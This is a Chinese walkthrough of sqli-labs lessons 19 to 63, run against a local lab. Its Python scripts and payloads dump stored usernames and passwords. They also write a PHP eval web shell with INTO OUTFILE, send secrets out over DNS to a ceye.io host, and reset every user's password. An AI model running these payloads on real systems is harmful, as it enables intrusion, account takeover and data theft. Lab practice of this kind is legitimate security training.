1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

代码

1
2
3
4
5
6
7
8
9
10
11
from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
headers = {
'referer': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '"
}

print post('http://localhost/sqllab/Less-19/', headers = headers,data=pdata).text

Day20-Less20

分析

1
2
3
4
5
6
7
8
9
10
select XX,XX from XXXX where username='$cookie' LIMIT 0,1
dhakkan'
'dhakkan'' LIMIT 0,1

select XX,XX from XXXX where username='
' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#
' LIMIT 0,1

比较简单

代码

1
2
3
4
5
6
7
8
9
10
11
12
from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
u = "uname=' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#"
headers = {
'cookie': u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-20/', headers = headers).text

Day21-Less21

分析

1
2
3
4
5
6
7
8
9
b64encode("
troy'
")
->
'troy'') LIMIT 0,1

troy')

') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from requests import *
from base64 import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

u = b64encode("') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-21/', headers = headers).text

Day22-Less22

分析

1
2
u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
和 21 一样,只不过单引号改双引号

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from requests import *
from base64 import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-22/', headers = headers).text

Day23-Less23

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
select *,* from XX where id = '$id' LIMIT 0,1

1'-- -
->
' LIMIT 0,1
select *,* from XX where id = '1'-- -' LIMIT 0,1

''
->
ok
select *,* from XX where id = '''' LIMIT 0,1

1''
->
ok

1#
->
ok

'1' and 0--+
->
1' and 0 ' LIMIT 0,1
select *,* from XX where id = ' '1' and 0--+' LIMIT 0,1

过滤注释,bypass:
select *,* from XX where id = '
' or 1 union select 1,2,'3
' LIMIT 0,1

1' union 1,2,3||'1
select *,* from XX where id = '
1' union 1,2,3||'1
' LIMIT 0,1

利用:
报错:
1' union select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)),2,3||'1

时间:
' or 1 union select (select sleep(1) from (select 1,2)x where length(database())=7),2,'3

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
from requests import *
import re

for i in range(256):
row = "0' oorr 1 oorr '"
row = row.replace(' ','%%%x' %(i))
html = get("http://localhost/sqllab/Less-26/?id="+row).text
print re.findall('result:(.+)</font> ',html)[0]
if 'Dumb' in html:
print row
print html


Day24-Less24

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
UPDATE table SET password = '' WHERE username = '' and password = ''
INSERT INTO("username","password") VALUES('2','1');

1') or 1#
1" or 1#

1")#
INSERT INTO("username","password") VALUES('','1');


select (updatexml(1,concat('*',(select username from security.users limit 0,1)),1)) from (select 1,2)x
注册一个用户:
' or 1 or '
密码为 hack
然后修改密码为 hackme,提交后数据库全部的用户密码都为 hackme
UPDATE table SET password = 'hackme' WHERE username = '
' or 1 or '
' and password = ''
比较奇怪的地方是,这样修改的时候,后台貌似能检测到,看了一下源码,有以下判断:
$row = mysql_affected_rows();
if($row==1)
那就能解释这个问题了
但是 即使返回了错误页面,数据库实际上已经执行了


假如你知道管理员的账号,那么你可以注册一个
admin'#,密码为 troy
然后登陆修改密码
UPDATE table SET password = 'troy' WHERE username = 'admin'#' and password = 'troy'
实现重置管理员密码

用户名密码字段长度限制,没法再深入
' or 1 or '就占用 11 个字符了,只剩 9 个字符可用,database()都有 10 个字符

Day25-Less25

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14


0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)--+
password 中的 or 被过滤成 passwd,报错
Unknown column 'passwd' in 'field list'
改成下面就 ok 了

0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

还可以:
0' oorr (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

利用的话
0' union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users--+

Day26-Less25a

分析

1
2
3
4
5
6
7
8
9
10
11
数字型
盲注
基于错误:
0 oorr length(database())=7

时间:
1 aandnd (select sleep(1) from (select 1,2,3 )x where length(database())=8)

其他利用
0 union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users

Day27-Less26

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
select *,* from XX where id = '$id' LIMIT 0,1

1'
->
'1'' LIMIT 0,1
select *,* from XX where id = '1'' LIMIT 0,1

'1'
->
1'' LIMIT 0,1
select *,* from XX where id = ''1'' LIMIT 0,1


select *,* from XX where id = '0' or 1 or '' LIMIT 0,1

基于报错:
0%27%a0oorr%a0length(database())=8%a0oorr%a0%27
1%27%a0aandnd%a0(select%a0(updatexml(1,concat(%27|%27,(select%a0username%a0from%a0security.users%a0limit%a00,1),%27<>%27,(select%a0passwoorrd%a0from%a0security.users%a0limit%a00,1)),1))%a0from%a0(select%a01,2)x)%a0oorr%a0%27

或者
0'%a0union%a0select%a01,2,group_concat(username,'<>',passwoorrd,'<br>')%a0from%a0users%a0where%a0'1


select *,* from XX where id = '0' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '' LIMIT 0,1


代码

1
2
3
4
5
6
7
8
9
10
11
12
from requests import *
import re

for i in range(256):
row = "0' oorr 1 oorr '"
row = row.replace(' ','%%%x' %(i))
html = get("http://localhost/sqllab/Less-26/?id="+row).text
print re.findall('result:(.+)</font> ',html)[0]
if 'Dumb' in html:
print row
print html

Day28-Less26a

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
0%27%a0oorr%a01%a0oorr%a0%27

基于错误
0%27%a0oorr%a0length(database())=7%a0oorr%a0%27

这个没报错
1')%a0union%a0select%a01,2,3%a0from%a0users%a0where%a0('1

1') union select 1,2,3 from users where ('1

所以可以利用如下
0%27)%a0union%a0select%a01,2,group_concat(username,%27*%27,passwoorrd,%27%3Cbr%3E%27)%a0from%a0users%a0where%a0(%271

0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1


应该有个判断,如果有错误也不抛异常
比如下面这句是 gg 的
1')  and  (select  (updatexml(1,concat('|',(select   username   from   security.users   limit   0,1),'',(select   password   from   security.users   limit   0,1)),1))  from  (select   1,2)xor  ('0

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from requests import *
import re

#for i in range(256):
#row = "0' oorr 1 oorr '"
#row = row.replace(' ','%%%x' %(i))
#html = get("http://localhost/sqllab/Less-26a/?id="+row).text
#print re.findall('result:(.+)</font> ',html)[0]
#if 'Dumb' in html:
#print row
#print html


row = "0') or (select (updatexml(1,concat('|',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or ('"
row = row.replace(' ','%a0').replace('or','oorr')

html = get("http://localhost/sqllab/Less-26a/?id="+row).text
print html
print 'XPATH' in html
print row```

## Day29-Less27
### 分析

只过滤了空格以及 union、select, sql 大小写不敏感,随便大写一下就过了,空格用 %a0
或者多嵌套几层
0" uunionnion seseleselectctlect 1,2,group_concat(username,'<>',password,'
') from users where "1
select 貌似过滤了几次,要多嵌套几层

EXEC('se'+'lect'+'* from users;' )

很简单:
0' or (selecT (updatexml(1,concat('|',(selecT username from security.users limit 0,1),'<>',(selecT password from security.users limit 0,1)),1)) from (selecT 1,2)x) or '

当然也有:
0' unioN selecT 1,2,group_concat(username,'<>',password,'
') from users where '1

和前几题一样的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

### 代码
```python
from requests import *
import re

#for i in range(256):
#row = "0' or 1 or '"
#row = row.replace(' ','%%%x' %(i))
#html = get("http://localhost/sqllab/Less-27/?id="+row).text
#print re.findall('result:(.+)</font> ',html)[0]
#if 'Dumb' in html:
#print row
#print html


row = "0' unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where '1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27/?id="+row).text
print html
print 'XPATH' in html
print row```

## Day30-Less27a
### 分析

对比 27,只是单引号改为双引号,而且不显示具体错误,其他一样的
既然屏蔽错误显示,报错注入当然也就不能用了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

### 代码
```python
from requests import *
import re

row = "0\" unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where \"1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27a/?id="+row).text
print html
print 'Dumb' in html
print row```

## Day31-Less28
### 分析

加了圆括号,其他没变
0') union select 1,2,group_concat(username,'<>',password,'
') from users where ('1

1
2
3
4
5
6
7
8
9
10
11
12
13

### 代码
```python
from requests import *
import re

row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28/?id="+row).text
print html
print 'Dumb' in html
print row

Day32-Less28a

分析

1
连空格都没过滤,,,,emmmmm  比起前几题很简单了,随便过

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
from requests import *
import re

row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28a/?id="+row).text
print html
print 'Dumb' in html
print row```

## Day33-Less29
### 分析

这题应该用 login.php 来玩
index.php 没啥用啊

这题第一次接触的时候没审计代码怕是过不去
首先能猜出后面只允许数字过,剩下的就都不知道了

审计代码发现,先过一个 java_implimentation,把第一个叫 id 的参数拿出来,然后,把这个参数扔到 whitelist 的白名单过滤
但是,\(id=\)_GET['id'];取得却是最后一次出现的 id,,也就是说,对于第二个出现的 id,毫无过滤。所以可以这样
?id=1&id=1'
就可以看到报错了
'1'' LIMIT 0,1
接下来该干啥干啥
select XX,XX,XX from XXX where id='' LIMIT 0,1

select XX,XX,XX from XXX where id='
0' union select 1,2,group_concat(username,'<>',password,'
') from users where '1
' LIMIT 0,1

?id=1&id=0' union select 1,2,group_concat(username,'<>',password,'
') from users where '1

1
2
3
4
5
6
7
8
9
10
11

### 代码
```python
from requests import *
import re

row = "1&id=0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1'--+"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-29/login.php?id="+row).text
print html

Day34-Less30

分析

1
2
与 29 相比,单引号改为双引号,其他一样
?id=1&id=0" union select 1,2,group_concat(username,'<>',password,'<br>') from users where "1

Day35-Less31

分析

1
2
与 30 相比,加了括号,其他一样
?id=1&id=0") union select 1,2,group_concat(username,'<>',password,'<br>') from users where ("1

Day36-Less32

分析

1
2
3
4
0' union select 1,2,group_concat(username,CHAR(61),password) from users--+

利用宽字节注入。
' -> %d6'

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
from requests import *
import re

row = "0' union select 1,2,group_concat(username,CHAR(61),password) from users--+"
row = row.replace('\'','%d6\'')

html = get("http://localhost/sqllab/Less-32/?id="+row).text
print html
print 'Dumb' in html
print row```

## Day37-Less33
### 分析

和 32 一样

1
2
3

## Day38-Less34
### 分析

如果报编码错误,那就运行一下这个:
alter table users convert to character set gbk;

0' union select 1,group_concat(username,CHAR(61),password) from users#

1
2
3
4
5
6
7
8
9
10
11
12
13
14

### 代码
```python
from requests import *
import re

pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-34/", data = pdata).text
print html
print 'Dumb' in html

Day39-Less35

分析

1
2
3
数值型

0 union select 1,2,group_concat(username,CHAR(61),password) from users

Day40-Less36

分析

1
2
依然可用宽字节
0%d6\' union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day41-Less37

分析

1
2
34 一毛一样
0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#

代码

1
2
3
4
5
6
7
8
9
10
11
from requests import *
import re

pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-37/", data = pdata).text
print html
print 'Dumb' in html

Day42-Less38

分析

1
2
3
4
5
Stacked injections:堆叠注入
就是多条语句,利用分号隔开
这题没有更好的场景,显得有点鸡肋
0' union select 1,2,group_concat(username,CHAR(61),password) from users--+
注入一句话倒是不错

Day43-Less39

分析

1
2
38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day44-Less40

分析

1
2
同 38
0') union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day45-Less41

分析

1
2
38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day46-Less42

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
报错在登录的时候可以爆出

pdata = {
'login_user': '1',
'login_password' : "' union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#",
}
不过返回的时候 XPATH syntax error 有截断,遍历一下就 OK 了:
ERROR 1105 (HY000): XPATH syntax error: 'Dumb<>Dumb<br>,Angelina<>I-kill-'
或者利用 concat 一个一个搞也行

这种情况下,不需要知道用户名
还可以这样
1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#




代码

1
2
3
4
5
6
7
8
9
10
11
from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#",
}

html = post("http://localhost/sqllab/Less-42/login.php", data = pdata).text
print html
print 'Dumb' in html

Day47-Less43

分析

1
2
3
4
同 42
加了括号
') union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#

Day48-Less44

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
基于时间
pdata = {
'login_user': '1',
'login_password' : "1' and (select sleep(2) from (select 1,2)x where length(database())=8)#",
}


不过这题可以重置所以用户的密码:
pdata = {
'login_user': '1',
'login_password' : "1' or '1' limit 1,1#",
}

来个更刺激的
' union select 1,group_concat(username,'=',password,'<br>'),3 from users#



select id,username,password from XXXX where username='1' and password='' union select 1,group_concat(username,'=',password,'<br>'),3 from users#' limit 0,1

代码

1
2
3
4
5
6
7
8
9
10
11
from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "' union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-44/login.php", data = pdata).text
print html
print 'Dumb' in html

Day49-Less45

分析

1
2
和 44 一样,加了括号而已
') union select 1,group_concat(username,'=',password,'<br>'),3 from users#

代码

1
2
3
4
5
6
7
8
9
10
11
from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "') union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-45/login.php", data = pdata).text
print html
print 'Dumb' in html

Day50-Less46

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sort 注入
1. 利用 rand(ture)和 rand(false)的结果不一样
?sort=rand(length(database())=7)
?sort=rand(length(database())=8)

2. 报错注入
?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
1 and (extractvalue(rand(),concat(0x3a,version())),1)

3. 延时注入
1 and (select sleep(1) from (select 1,2)x where length(database())=8)

4.其他
into outfile 啥的,都行

Day51-Less47

分析

1
46 相比,无法使用 rand 以外,其他都一样

Day52-Less48

分析

1
2
数字型
错误被屏蔽,延时注入即可

Day53-Less49

分析

1
2
与 48 一样,只不过是单引号型
1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day54-Less50

分析

1
2
3
4
5
堆叠注入
但是可以用前面几题过
0 or (select (extractvalue(rand(),concat(0x3a,version())),1))--+
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day55-Less51

分析

1
2
3
4
5
6
50 一样,加了单引号

1' and (select sleep(1) from (select 1,2)x where length(database())=7)--+
0' or (select (extractvalue(rand(),concat(0x3a,version())),1))--+


Day56-Less52

分析

1
2
盲注
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day57-Less53

分析

1
2
3
和 52 一样,加了引号而已

?sort=1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day58-Less54

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
开始有意思了,限制查询 10 次
第一次
?id=1 正常
?id=1' 不正常,没报错
?id=1' or 1--+ 正常
由于已知 databasename 是 challenges
那就先搞表名
?id=0' union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+
返回为

Your Login name:2
Your Password:35fb3t92ky<>id
,35fb3t92ky<>sessid
,35fb3t92ky<>secret_LKVY
,35fb3t92ky<>tryy

可以看到,表名为 at4bwg0te1,有 4 列:
id sessid secret_LKVY tryy

?id=0' union select 1,2,group_concat(id,'<>',sessid,'<>',secret_LKVY,'<>',tryy,'<br>') from challenges.35fb3t92ky--+

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from requests import *
from re import *

def GetTableName():
gdata = {
'id': "0' union select 1,2,group_concat('=>',table_name,'<>',column_name,'\n') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'#"
}

r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
html = r.text
return findall(r'=>([a-z0-9]+)<>(.+)\n', html)

def GetColumnName(q,tablename):
gdata = {
'id': "0' union select 1,2,group_concat('=>',%s,'\n') from challenges.%s#" %(q,tablename)
}
r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
html = r.text
return findall(r'=>(.+)<>(.+)<>(.+)<>(.+)\n', html)[0]


table = GetTableName()
tableName = table[0][0]
columns = ' [-]'+'\n [-]'.join(i[1] for i in table)
print '[+]TableName:', tableName
print '[+]CotablenamelumnsNames:\n', columns

q = ",'<>',".join(i[1] for i in table)
data = GetColumnName(q,tableName)

print '[!]Password is:', data[2]```

## Day59-Less55
### 分析

和 54 一样,只不过加了括号以及是数字型
0) union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges' or (0

?id=0) union select 1,2,group_concat(id,'<>',sessid,'<>',secret_25UU,'<>',tryy,'
') from challenges.e2du3yn5gq where (1

1
2
3

## Day60-Less56
### 分析

和前 2 题一样的套路
?id=0') union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0') union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'
') from challenges.7j9km4qsh7--+

1
2
3

## Day61-Less57
### 分析

和前 3 题一样的套路
?id=0" union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0" union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'
') from challenges.7j9km4qsh7--+

1
2
3

## Day62-Less58
### 分析

?id=0' or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat('<>',secret_2EOZ) from challenges.ae85jljdmd)))--+

1
2
3

## Day63-Less59
### 分析

和 58 一样,不过是数字型
?id=0 or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat('<>',secret_6GBR) from challenges.pebeduo6fx)))--+

1
2
3

## Day64-Less60
### 分析

和 58 一样,不过是双引号加括号
?id=0") or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat('<>',secret_QIN6) from challenges.ortaw2xc59)))--+

1
2
3

## Day65-Less61
### 分析

和 58 一样,不过是单引号加双括号
?id=0')) or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat('<>',secret_VSZ6) from challenges.est6bn4mqy)))--+

1
2
3

## Day66-Less62
### 分析

盲注
交给 py 去做吧

不过次数应该会大于 130
找到了一个更好的办法,DNS 解析
SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxxxxx.ceye.io\abc'))

所以可以构造
http://localhost/sqllab/Less-62/?id=1') and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到
q1bcv0fqh9.xxxxxx.ceye.io

继续,得到表名
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

继续,得到 key
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_T82V FROM challenges.q1bcv0fqh9 limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

emm
有点开挂的赶脚..

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145

### 代码
```python
from requests import get
from string import ascii_letters, digits

def GuessTBNameLenth(n, name):
global guessTime
print '[+]Guessing TableName Length'
i = 1
while 1:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
global guessTime
no = 0
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in ascii_letters+digits:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1)='%s' --+" %(DBName,no,i+1,n))
html = r.text
if 'Your Login name' in html:
name += n
print ' [-]', name
break

print ' [-]Tables Names is:', name
return name

def GuessCLMNum(tname,dname):
global guessTime
print '[+]Guessing Colunms num'
i = 0
while 1:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
global guessTime
i = 7
while 1:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, tname):
global guessTime

print '[+]Guessing Colunms for', tname
cnum = 2 #No.3
length = GuessCLMLen(cnum, tname, DBName)
name = 'secret_'
for i in xrange(7,length):
for n in ascii_letters+digits:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)='%s' --+" %(tname,DBName,cnum,i+1,n))
html = r.text
if 'Your Login name' in html:
name += n
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
print ' [-]The Colunms are',name

def GuessDatasnum(dname, tname, cname):
global guessTime
i = 0
while 1:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
html = r.text
if 'Your Login name' in html:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
global guessTime
print ' [-]Guessing data length'
i = 1
while 1:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
html = r.text
if 'Your Login name' not in html:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
global guessTime
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in ascii_letters+digits:
while 1:
try:
guessTime += 1
r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)='%s' --+" %(cname, dname, tname, no,i+1,n))
break
except:
print 'Relaxing...'
html = r.text
if 'Your Login name' in html:
name += n
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data

guessTime = 0
DBName = 'challenges'
TBsNum = 1
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print guessTime```

## Day67-Less63
### 分析

和 62 一样,要么盲注,要么 DSN

?id=1' and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+
